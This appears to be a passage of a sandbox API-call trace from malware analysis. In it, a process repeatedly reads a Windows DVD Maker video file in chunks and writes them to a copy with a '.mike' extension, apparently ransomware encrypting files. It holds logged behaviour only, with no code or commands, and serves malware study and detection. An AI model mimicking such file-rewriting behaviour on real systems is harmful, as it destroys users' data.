[0064.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.819] GetFileType (hFile=0x288) returned 0x1 [0064.819] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x357220 [0064.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.819] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.820] GetFileType (hFile=0x288) returned 0x1 [0064.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.820] GetFileType (hFile=0x288) returned 0x1 [0064.820] ReadFile (in: hFile=0x288, lpBuffer=0x2243c84, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2243c84*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.821] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.821] GetFileType (hFile=0x288) returned 0x1 [0064.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.821] GetFileType (hFile=0x288) returned 0x1 [0064.821] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x359a20 [0064.822] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.822] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.822] GetFileType (hFile=0x288) returned 0x1 [0064.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.822] GetFileType (hFile=0x288) returned 0x1 [0064.822] ReadFile (in: hFile=0x288, lpBuffer=0x2250cb4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2250cb4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.823] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.823] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.823] GetFileType (hFile=0x288) returned 0x1 [0064.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.823] GetFileType (hFile=0x288) returned 0x1 [0064.823] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x35c220 [0064.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.824] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.824] GetFileType (hFile=0x288) returned 0x1 [0064.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.824] GetFileType (hFile=0x288) returned 0x1 [0064.824] ReadFile (in: hFile=0x288, lpBuffer=0x225dce4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x225dce4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.825] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.825] GetFileType (hFile=0x288) returned 0x1 [0064.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.825] GetFileType (hFile=0x288) returned 0x1 [0064.825] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x35ea20 [0064.826] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.826] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.826] GetFileType (hFile=0x288) returned 0x1 [0064.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.826] GetFileType (hFile=0x288) returned 0x1 [0064.826] ReadFile (in: hFile=0x288, lpBuffer=0x226ad14, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x226ad14*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.827] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.827] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.827] GetFileType (hFile=0x288) returned 0x1 [0064.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.827] GetFileType (hFile=0x288) returned 0x1 [0064.827] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x361220 [0064.828] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.828] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.828] GetFileType (hFile=0x288) returned 0x1 [0064.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.828] GetFileType (hFile=0x288) returned 0x1 [0064.828] ReadFile (in: hFile=0x288, lpBuffer=0x2277d44, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2277d44*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.829] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.829] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.829] GetFileType (hFile=0x288) returned 0x1 [0064.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.829] GetFileType (hFile=0x288) returned 0x1 [0064.830] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x363a20 [0064.830] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.830] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.830] GetFileType (hFile=0x288) returned 0x1 [0064.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.830] GetFileType (hFile=0x288) returned 0x1 [0064.830] ReadFile (in: hFile=0x288, lpBuffer=0x2284d74, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2284d74*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.831] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.831] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.832] GetFileType (hFile=0x288) returned 0x1 [0064.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.832] GetFileType (hFile=0x288) returned 0x1 [0064.832] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x366220 [0064.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.832] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.832] GetFileType (hFile=0x288) returned 0x1 [0064.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.832] GetFileType (hFile=0x288) returned 0x1 [0064.832] ReadFile (in: hFile=0x288, lpBuffer=0x2291da4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2291da4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.833] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.833] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.834] GetFileType (hFile=0x288) returned 0x1 [0064.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.834] GetFileType (hFile=0x288) returned 0x1 [0064.834] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x368a20 [0064.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.834] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.834] GetFileType (hFile=0x288) returned 0x1 [0064.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.834] GetFileType (hFile=0x288) returned 0x1 [0064.835] ReadFile (in: hFile=0x288, lpBuffer=0x229edd4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x229edd4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.836] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.836] GetFileType (hFile=0x288) returned 0x1 [0064.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.836] GetFileType (hFile=0x288) returned 0x1 [0064.836] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x36b220 [0064.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.837] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.837] GetFileType (hFile=0x288) returned 0x1 [0064.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.837] GetFileType (hFile=0x288) returned 0x1 [0064.837] ReadFile (in: hFile=0x288, lpBuffer=0x22abe04, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22abe04*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.838] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.838] GetFileType (hFile=0x288) returned 0x1 [0064.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.838] GetFileType (hFile=0x288) returned 0x1 [0064.838] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x36da20 [0064.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.839] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.839] GetFileType (hFile=0x288) returned 0x1 [0064.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.839] GetFileType (hFile=0x288) returned 0x1 [0064.839] ReadFile (in: hFile=0x288, lpBuffer=0x22b8e34, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b8e34*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.840] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.840] GetFileType (hFile=0x288) returned 0x1 [0064.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.840] GetFileType (hFile=0x288) returned 0x1 [0064.840] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x370220 [0064.841] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.841] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.841] GetFileType (hFile=0x288) returned 0x1 [0064.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.841] GetFileType (hFile=0x288) returned 0x1 [0064.841] ReadFile (in: hFile=0x288, lpBuffer=0x22c5e64, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22c5e64*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.842] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD 